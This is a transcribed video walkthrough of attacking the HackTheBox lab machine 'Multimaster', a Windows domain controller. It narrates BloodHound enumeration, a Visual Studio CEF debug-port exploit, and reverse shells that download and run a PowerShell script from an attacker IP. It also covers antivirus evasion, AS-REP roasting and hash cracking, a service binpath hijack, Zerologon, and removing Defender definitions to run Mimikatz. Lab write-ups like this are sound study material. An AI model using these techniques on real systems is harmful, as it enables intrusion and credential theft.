support. If I don't put that, there's a typo. Is it going to crash? Yeah. Okay. We could just put it in a directory we have access to read, but there's one thing I just thought of. I'm going to do responder-i ton 0. And we're going to try to copy Bloodhound again. It's going to fail. But, oh, we already know this username's password. Never mind. What I was going to do is capture his hash off of this to try to get a password. Let's see. We can check out E real quick. That's a directory. Department, IT, development, let's see. Is it get child items dash recurse? And see if we have anything interesting. Doesn't look like we do. So let's go back into C. And I was really hoping I could just copy this way. I always hate doing username password. Well, maybe it'll work with Evil-WinRM. Let's try this. Dash user ipsec dash password ipsec username. And dash SMB2 support. Okay. So new PS drive ipsec. Let's look up the command. New PS drive. Dash name. Yeah, we have to give it a credential. It's always a pain generating the credential. Dash name ipsec. Where's the location? Let's see. Let's get rid of user password real quick. Just try good old net use command. z:10.10.14.2 \share. Okay, so we have to actually probably create a credential object and do PowerShell. So let's do that. Actually, we don't. We get to be a little lazy because we're in Evil-WinRM, not just a netcat shell. We can use the download command. Download #, or not that. Download this. And we'll give it this name. And we're downloading it. Awesome. It's always handy knowing multiple ways to do things. That should be in the logs directory. Okay. Let's go. We'll create a new pane. Neo4j console. And if you don't know your Neo4j password, which I don't right now, I'm going to do locate Neo4j grep auth. And I'm just going to delete this file. There's a better way. There's other ways to reset the password Neo4j, but this is the one I can always remember because it's easy to remember to delete a file called auth and not run some weird commands to reset your password. Remote interface, so we can go here. We're about to finally run Bloodhound. Default password is Neo4j. I just changed it to password. So now we can go into opt, Bloodhound, And we actually want the Bloodhound Linux SUID sudo chown root on Chrome sandbox, and then sudo chmod 4755 on the same thing. Neo4j Password Login. And now we just drag and drop. I wonder if I can just upload data. Does that work? It does. Root. Oh no, it's HTTP Multimaster. And it's probably in the logs directory. And we're processing the file. Okay. So we can go to queries, find all domain admins. Look at this. Suppose it didn't list actual admins. Let's see. Shortest paths to domain admin. And either we didn't query the right thing, or we don't have a lot of data. Let's see. Find ASRep roastable passwords, nothing. Cobra roastable accounts. Bloodhound is lagging behind. Oh, I think my VM froze. The green is not moving. Yeah, my VM froze. So I'm going to reboot the VM. Okay, my VM's been rebooted. And I'm really glad now I did the script command, because we can get right back where we were pretty quickly. So I'm going to do cd logs, and I'm going to do script, and then we'll do -2, and just copy the command, because everything we did was logged. Then I can also cat logs and go into this and get into the directory easily. And we're pretty much exactly how we left off. So the logging was a little bit inconvenient, but you can see the real benefit. Let's do sharphound.exe-c all. I'm going to specify all collection methods. I didn't do this last time, so we're going to see if this changes anything. So Neo4j console, let's open up Bloodhound. So we have to sudo run that. Opt Bloodhound Linux. And before I import the new one, let's just mark this guy as owned. We're going to see if it says anything different. So let's see. Mark user as owned. And then we want to do queries. And shortest paths from owned principals. Those are just links here. Find all domain admins. Wonder if that's only showing one layer. We'll find out in a second. Let's just download the new Bloodhound data. So download this. Okay, this ends in 530. So let's upload data 530. finish processing, run the command again. So we'd have to edit Bloodhound to show users of this group. But we can just click on it and select, I think this, member of administrators. And this has 3 group members, and these are user accounts and someone. I wonder if domain admins is just empty. I wonder if no one's a domain admin, and that's why. But the shortest paths from own principles returns nothing. So we don't really have anything right now. Let's go back to the box. And back when I did WinPEAS, there was some ports on 127. So 1434, this is probably MS-SQL. This one, I don't know exactly what it is. And we can do git process. And we see a bunch of processes with code. And we don't know exactly what this is either. So if we enumerated super well on this box, we would have seen there's Microsoft Visual Studio on this. And if we go into Microsoft Visual Studio, I think we can find out what version it is or find out it's old. So there's a lot of Googling around, and eventually you find out that port is a debug port in Visual Studio. So we go back to a web browser. And this, again, this piece of the box takes a long time to figure out because there's no way to, in my knowledge, to get like information about that process other than the process code exists. We can't see the username because we're not in a privileged context. And in netstat, we can't see the PID of the process. But we can see, if you run this periodically, these come and go. So we'll see this 13638 and 41068 disappear probably after we download this. And we got a bunch down here. Oh, there's a UDP. But yeah. So we'll run this one more time. And we'll run it again after we download CEF. But CEFDebug, is that it? Yep. So this is the program we want. And you do CFDebug -- URL, and then the node code you want to do. So we have a way to execute code. So let's download it. Is there a releases? Download this. Then let's copy this. I'm going to run netstat again. So 638068. Those two exist. We got another one running. And if you looked at the code processes, you probably see another Visual Studio process open up. So if we go to www, unzip, downloads, cfdebug.zip, and I'm just going to move that to my directory. And we can do this again, 112638. And you can see those are gone now. So that's just showing weird behavior. Go back into my directory, Python 3, HTTP server, wget 10.10.14.2, 8000, cfdebug.exe -o, cf, I'm just going to call it cef.exe. Okay, we have downloaded it. So the next thing we want to do is have a good way to get a reverse shell to me. So let's do cp opt user share nashang shells invoke PowerShell TCP.ps1. And we just want a reverse shell. IP address is going to be 10.10.14.2. And the ports, 9001. Okay. So let's start up a web server again. IX new object net.web client download string HTTP 10.10.14.2 8000. What do I call it? Let's move that to be shell.ps1. And in my last Windows video, I think I used invoke web request to do a reverse shell. I just forgot the syntax off the top of my head, so that's why I'm using this one. Let's see. Malicious content has been blocked, but we see it actually made the request back to us. So it's the nashang shell that got blocked, not our IEX command. So we can do vi shell.ps1. And I'm going to delete the help because that's not needed in the program, and sometimes signatures are created based upon that. And the function's going to be please work. Go down here. Please work. So we changed up the reverse shell very, very slightly. Got it, and we get a reverse shell. Great. So now we can probably move forward with this CEF exploit, I think. So let's see. We're probably going to want to do let's do something simple first in a ping. So let's see. We want to run it, cf.exe, and his example he puts the URL there. I'm going to do the URL last. So I'm going to do cef.exe --code, and we want to do ping. Ping 10.10.14.2 --URL this. And you have to be relatively quick with it, so I don't think it's going to work because the socket's probably closed, but we'll find out. So I'm just going to do it in this window, actually. TCP dump -I ton0 ICMP sudo paste the CEF command. Hey, we got a ping. So we are making progress. The thing we have to do now, though, is get a reverse shell. And that's what we have here. We can do PowerShell. However, we got a lot of quotes we're working with right now. And the IEX does use quotes, which is going to get a little messy. So what I'm going to do is we're going to go back here. Look at a PowerShell command. We'll look at our IEX command. Let's just copy this. Gonna go here and just echo it out. And it's using single quotes. Okay. And then we can convert it to UTF-16 little endian because that's the Windows format. Don't know why they chose that, but whenever you do base64 from Linux to Windows, you have to specify it is UTF-16 little endian. If you don't do that, your PowerShell code's, your base64 is going to be about half the distance or half the length. So let's get rid of that iConvert, and you can see the big difference. And that's because if we look at XXD here, it's using 2 bytes for everything. So 4900 and little endian. If this was big endian format, it would be 0049. But least significant bit first, and it goes like that. So if we don't do that iConvert, you can see it's not doing any 00s. But yeah. So base64-W0, we can copy this. And before we do anything, it's always, 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 always handy to test the code out before you put in an exploit. So PowerShell-ENC, and we get a shell. Do I have that CEF command here still? So now we can do PowerShell-ENC, paste. And all we want to do is grab up to the URL. So go back to our script. We can get rid of TCP dump. Build a new shell. And we're going to do cef.exe. And this is going to say which sockets are debug sockets for Visual Studio. And we're going to paste and then put the socket. It should any minute now. Sometimes it takes a while to actually output. There we go. There were 3 servers that appear to be CEFDebuggers. So let's go and paste. And we get a shell. So if we do who am I here, we're Sayurk. So we can go back into Bloodhound. And I probably should have done a script command before this to log it, and then our LRAP as well. So let's do this again real quick. CD logs cyork script cyork.log. Where's my? We'll just do rlwrap nclvnp 9001. We can try a different URL. I'm guessing it's not going to be listening still, but you never know. It is. So, got a shell. Who am I? And since I have rlwrap, I can do up and down. So we can go back to Bloodhound. cyork at Megacorp. Hit enter. Why are you not? Okay. To get rid of this target node thing, you click the highway. And we're going to mark this as owned. And we're going to do queries. Shortest paths from owned principals. Wait. Why did not say the other one? Own principals, Megacorp. We have Sayurk owned. Oh, shortest path from owned. Merck is owned. Okay. Queries, own principals, owned, Megacorp, Sayurk. And I don't think we have anything. So let's see. two high value targets. Oh god, there's a lot of things here. So let's see. That's that. Seeing if we have our other user here. Doesn't look like we do. So let's go back, and one of our goals was to get into the inet pub directory and write a web shell to get a shell as IIS user so we have the SE impersonate. And this user has access. If we type web.config, is there anything good in here? Let's see. Echo test to T. Doesn't look like we can write. Echo test to web.config. So we don't have any write permissions in this directory. There is a bin. If we go inside of bin, there is one DLL that really sticks out, Multimaster API.dll. So let's grab this, and I'm going to copy this into our Windows directory, and then we'll download it. So download, and then paste. Download successful. So if we go into our logs directory, we can look and see this is .NET. So we could copy this over to a Windows machine and decompile it. But before we take all that effort, I'm just going to run strings against it, and we'll see if we have anything. Doesn't look like anything there. And if you didn't know, strings has multiple encoding options. So -E. So I'm going to do L, -E L on that. And we get a password. So UID finder. Remember, this is the username the SQL Server was listening on, or like when we did like DB user or whatever it was. And then the password as development. So let's go and do another crackmap exec on -U, usernames -P, development, SMB, 1010 179. Put this in quotes because that exclamation point's a special character, and I don't know if bash will handle it. I don't know what bash will do to it. And we get sbauer as a user. If I didn't get any users, I'd probably do the like net user command /domain and copy all these users to that username list. But we have one as sbauer. So let's log in as him and see what he has. I guess before we do that, we can actually just look him in BloodHound, mark him as owned. Mark as owned. Shortest pass from owned principals, sbauer. So that's nothing special. Shortest paths to high value targets. And we have sbauer right here. Can I zoom in? I can. So sbauer has generic all over account operators, which has write DACLs over administrators. If we right click and do help, abuse info, let's see. We could potentially grant yourself the add member privilege to the administrator group. So we could potentially do that. PS remote. What else do we have? We have generic write over Jordan. So there's two main things I guess we can do. We can potentially Oh, wait. I think that's saying administrator has right DACL over account operators. Yeah. So we have generic right to Jordan. And if we look at generic right, generic right accessibility to write any non-protected attribute on the target, including members for a group, service principal name, etc. So let's see, what is this doing? I think this may be setting his password. I thought that would be protected. Anyways, when I get this generic right over a user, I generally enable curb roasting on that user, which may be what it was saying, but we can probably do it without these commands. Oh yeah, so there it is. So it's creating a service principal name for that user, which then exposes the password in Active Directory, I think. But that's essentially what we'll do. So let's do Evil-WinRM. Actually, before we do that, script sbower.log Evil-WinRM -I 10.10.10 179 -u for user s bower-p. I wonder if I have to do megacorp. Probably not. We'll find out. Okay, so we're back on the box. So let's see. We want to get the Jordan user and make him curb roastable. So we'll do get AD user Jordan, maybe EN. Okay. Then we can set AD account control does not require pre-auth to true. And before we do that, I'm going to run the impacket command. So let's do locate impacket grep example cd user shared doc python 3 impacket examples, and then we'll do get np users megacorp -request, I think. Let's see. Is that how? Domain / ping megacorp sudo vi etc host. We can do megacorp there and specify .local. I'm doing that right. Let's try running this now. Go again. Did it specify the username? I don't think I do. There we go. I wonder if I do megacorp guest. Still going to return anything? Okay, so I guess I had to specify the user. And if we wanted to prevent do good OPSEC, we turn it back to false. And now when we do this request, it's not set. So we have a password we can crack again. So let's go back into the Kraken. cd hashcat v hashes KOB, I guess I'm just going to put. So 23. Let's do hashcat -- example hashes grep ap 23 grep 23. Let's see. Cat hashes KOB. And I'm just going to search for this. And we can do -b 5, and that's mode 18200. So /hashcat -m 18200 hashes kob opt word list rocku. And let's see if we can crack this hash. And it looks like we did. Let's just do --o. And the password is rainforest786. So let's see. We can exit that SSH. Rainforest786 v passwords. Just going to put that there. And we can now search for Jordan. Get our queries. Let's see. If I can spell EN. Mark this person as owned. And then shortest paths from own principals. Nothing here. Shortest paths to high value targets. See, Jordan is here. It's a member of server operators, privileged IT accounts. I don't know exactly what that one does, but there's not much else we can do with this. But it is a member of server operators. So let's go on to this box. Logs. We can do script jordan.log Evil-WinRM 10.10.10.179-u jordan-p rainforest something. Cat passwords 786. Okay. Let's try running WinPEAS again. So I'm going to go back into this directory where WinPEAS is saved. I'm going to run it again, and maybe this will tell us what that server operator account can do. So /winpeas.exe. And we're just going to let this run and look over the results. Now that WinPEAS is finished, we can go up and look through the results. And we have generic write over a lot of these services. So that service operator looks like it is giving us write access over all the services. So let's see, what's a service we want to edit? Glancing through, we can do USO SVC because we've done that in previous videos. So let's try /sc.exe. Does that work? It does. So if you just do sc without exe, PowerShell is going to translate it into, I think, set content or something. So you have to specify .exe in PowerShell. If this was a command prompt, we wouldn't have to. So config USO SVC bin path is equal to. Let's just try PowerShell -enc. And what is a command? We go logs grep-i enc. Do we have it? Hey, we do. See, logging makes life so easy. Okay. We can try this. And we can Control-C out of this shell, nc lvnp 9001. And we can do sc.exe, stop USO SVC, and then we can start it. Cannot be started. Let's see. I wonder if we can enable. Let's see. Google sc.exe enable service. It's probably config enable equals something. service name start equals auto. So c.exe config uso svc start equals manual. Let's see, invalid field. sc.exe config service name auto. Okay. Start this. Did not respond in a timely fashion. And we didn't get a shell. So I'm guessing it's maybe the bin path. So let's try C:\Windows system 32 cmd.exe/c and then that PowerShell string. Start. Let's try stopping and then starting. And we're not getting anything. So maybe there's some like length limit on this. Let's see. We can try pinging. So ping 10.10.14.2. And then sudo tcp dump -i ton0 icmp. The bin path is set. And that does work. So it's probably some type of length. Or we copied it wrong. So the very first thing I'm going to do is copy this. PowerShell-enc, paste. Not properly encoded. So sometimes logging helps, other times it doesn't. I guess when you don't properly copy something. Let's see. What did I have? That's what I did. ENC. Let's see, do we have iConvert in here? So I think I just didn't copy the whole thing. I think the logging, because like it had binary data in it, the log was bad because it stopped at this W and we keep going. So let's delete all this. And we'll paste it again. We are listening. Start. And we get a shell as system. So that'll be the box. We have another way to do the box, an alternative route to do this box, and it's going to go so much quicker than this whole thing. I have no clue what the video length is right now, but I am guessing it is pretty long. So we're going to start the box from scratch, and we're going to use the Zero Logon to exploit it. So let me just exit everything. And we're going to do Zero Logon, which is the exploit that came out like 4 days before this box retired, that allows you to reset the machine password of a domain controller. So sounds a lot of fun. So full disclaimer, I haven't actually done this exploit live yet, so this will be the first time running through it, so I'm going to explore a little bit afterwards. However, I am creating a snapshot of the VM just because, yeah, it could go south very quickly. So we're going to search for CVE-2020-1472 GitHub, which is the ZeroLogin CVE. We're going to download it. So git clone. Okay. And let's see. I guess we can import Impacket as well. So GitHub, Impacket. And this is going to be the main reason why I snapshot of my machine. cd Impacket, git pull. When's the last commit? 3 days ago. That's fine. So let's see. / setup.py, python3 setup.py, install. Is that how we do it? Let's see. What is in packet? Requirements. We can just do pip3 install in packet. Wonder what version this grabs. Do the dangerous thing. Python3 setup.py install. Okay. Dangerous always trumps non-dangerous, I guess. cd opt. Do we have the CVE here? Python3. Okay, DC name and DC IP. So this is going to be megacorp.local 10.10.10.179. Let's see. I'm going to try Multimaster. Okay. And it's got to do like 256 authentication attempts. In packet, no attribute. So in packet is not using the latest version. Let's see. Trying to think. Locate in packet. User share. Disk packages. We probably should create a virtual environment for this. This is why we create snapshots, though, because we don't feel like creating a virtual environment. What happens if we run this now? I was hoping I just deleted the in packet that came with either pip or apt, and now hopefully it defaults to the one I manually installed, but I'm not positive if that's the case. And if that's not the case, then we will use virtual env to install it. Come on. And it still failed. So let's try doing it the correct way. I'm going to restore my snapshot before I mucked around. And we will try to create a virtual environment. So let's go to cd opt in packet, git pull again, and then we can do python3 -m and we have to give it the environment directory, which I'm just going to call VM again, and not created successfully because ensure pip is not available. apt install python3 -venv sudo. Yep, let's install this. And these processing triggered for mandb always take so long. There we go. Create the environment. And then we can do source VM bin activate. And we can just do pip install period. So this should create a virtual env. We don't have something. Maybe we need to install python3 -dev. Deactivate sudo apt install python3 dev. C. You don't have something to build. I've encountered this one before. Let's see. If I just Google invalid command bdist wheel Python. Let's see. Doesn't have something to build. Thought it was the -dev package, but may not be. pip3 install wheel. Try this. Okay, that worked. I just saw they were asking for a wheel, so that's why I installed that. So now that we have this, we may be able to run Python 3 opt CVE. Oh, I don't even have it here. CVE-2020-1472 GitHub. cd dot git pull. What? Oh, git clone. And then Python 3 CVE Multimaster. I forget what the other argument was. IP 10.10.10.179. So let's see if this works. It's going to take a little while, so we're going to speed up the video yet again. So the command finished, and it says target vulnerable, changing account password to empty string. So now we should just be able to do a secrets dump, just DC, no password, multimaster, and then $$ for machine account at 10.10.10.179. And we log in and are able to extract all the hashes. So at this point, we could Control-C out of it and use this password hash, the 69 whatever, with psexec administrator at 10.10.10.179. Probably -hashes, is it? There we go. And in like 5 minutes maybe, we have completed the machine from start to finish just based upon the Zero Logon exploit. So it's pretty much like Eternal Blue to domain controllers. The downside right now is we left a glaring vulnerability. There's no password on the DC's machine account, so that's not good. Let's see. Can we specify the account we want? Let's see. So we have target. SVC NAS. Is this only going to target IP? Let's see. At SVC NAS. I'm trying to get it just to dump one account right now. This is the part that I haven't done before, so not exactly sure how to do it in this. If I just use Mimikatz, I know how to do it. And that may be what we end up doing. Just DC user. Let's see. And packet, secrets dump, specify user. Does he have NTDS, dumping tables? I'm probably just going to upload Mimikatz. Multimaster because I don't know how to specify the username. Exec method, no. Just DC user doesn't sound like it. I'm going to add the history flag, let that run, and we're going to grab the Mimikatz. So Mimikatz, GitHub. Let's see. So release. Mimikatz trunk. See. Okay, we actually got the history. So 31D6, this is the empty hash, and here's the last password the machine was set at. And that's the NTLM hash. So I don't know how to set the password as NTLM. Let's see. Password reset director NTLM. It's probably that reset.py in this thing. So if we go restore password.py, let's see, dash hashes, lm ntlm. Okay, so let's do it this way. Multimaster, and we're going to go like this. Python 3, restore password.py. And how do they say to do it? Okay, multimaster domain / box and then box. So let's do megacorp multimaster.local at multimaster dash hashes, like that. And we probably want dash target dash IP dash target dash IP 10.10.10.179. And let's see, argument should be bytes buffer. What? I wonder if he did something special with this. So let's do dash hex pass real quick. See if this works. Access denied. Well, we may have done something good. Let's see. Do we get access denied here? No, we do not. So we have to do dash no dash pass. Did I forget a flag? Let's see. Python restore password. Okay. Let's get rid of that no pass. Maybe it doesn't want the dot local. Let's see. Target. Looking at how to specify a username. 10.10.10.179 cat etc host megacorp.local multimaster. So everything is good there. Just doesn't want to restore. So I think the answer is let's use Mimikatz real quick. So let's see. First, let's psexec. So we can just go back as administrator. And then we have Mimikatz in our downloads. So cp downloads Mimikatz chunk 7zx. And then we can go into x64 mimikatz.exe. So I'm going to copy mimikatz.exe to auth CVE because that's where it was. I think I can just upload mimikatz.exe. Upload mimikatz.exe. Okay. So Evil-WinRM. cpx64 mimikatz.exe here. And let's see. I think I can just write to program data. It's easier than going into that system32. Mimikatz.exe. Come on, no antivirus. If Defender is not running, we'll be able to execute Mimikatz and be happy. cd / cd program data. /mimikatz.exe. Exit. The system cannot execute the specified program. So it looks like there is Defender on this box. We can copy Mimikatz to SQL/Windows. And Defender has deleted it. Let's try removing all definitions. So cd /progo1, I think. And that'll probably be in cd Windows Defender. We should have like an MP CMD something. There it is. So we can copy this. And then -remove definitions all. Re-upload Mimikatz. And let's see if this works. So all we did was delete every signature in Defender, and since HackTheBox doesn't have internet access, it can't go and download them again. So this could help out. Come on. /mimikatz.exe. There we go. So we have Mimikatz. So let's see. /mimikatz.exe. LSA dump set ntlm /user multimaster $/ntlm. And we gotta get that hash. Hex pass. It's not it. Make this bigger. Let's see. Where is it? That's what we want. Set it to be this. Okay. Shoot. And we don't have exit. Oh, sweet. It did exit. So probably should have URL wrapped something. Let's paste the hash down there. We don't need this session anymore, so I can close it. Let's see. The annoying thing about Mimikatz, and that is the default argument separator is space, so I'll probably have to put this in quotes. Like this. And then exit. Try that. And it looks like it's set. So hopefully, when we run secrets dump again, probably did it in this session, we have no pass on this, and it fails. That's good. So let's see. We can say secrets dump. We don't actually have the administrator password. I wonder if we can do -hashes to log in. PS exec. Log in this way. We'll say Multimaster or Mega Corp Administrator. Let's see. I know what I did. My arguments are messed up. This is the actual login right here. So let's get rid of it and get rid of no pass. And we can say Multimaster Administrator at 10.10.10.179. Maybe 2 backslashes. Let's see. Try 1 backslash. Multimaster. Let's not specify a domain. There we go. So now it's dumping. And I want to do history. I think I got rid of history. Oh no, I did not. Oh well, we just wasted like 30 seconds of your time, but this should show us that we have restored the password to be the same exact thing. And I'm sure Impacket has an option, but honestly, I don't use Impacket that much. I normally use Mimikatz. Let's see. Multimaster history, so we can see the password is here. Oddly enough, I guess maybe when you have a blank password, it doesn't store in the history. I don't know what that password was. Maybe a failed attempt. But yeah, we have restored the password to be this one. So that'll be the box. Hope you guys enjoyed it. Take care, and I will see you all next week.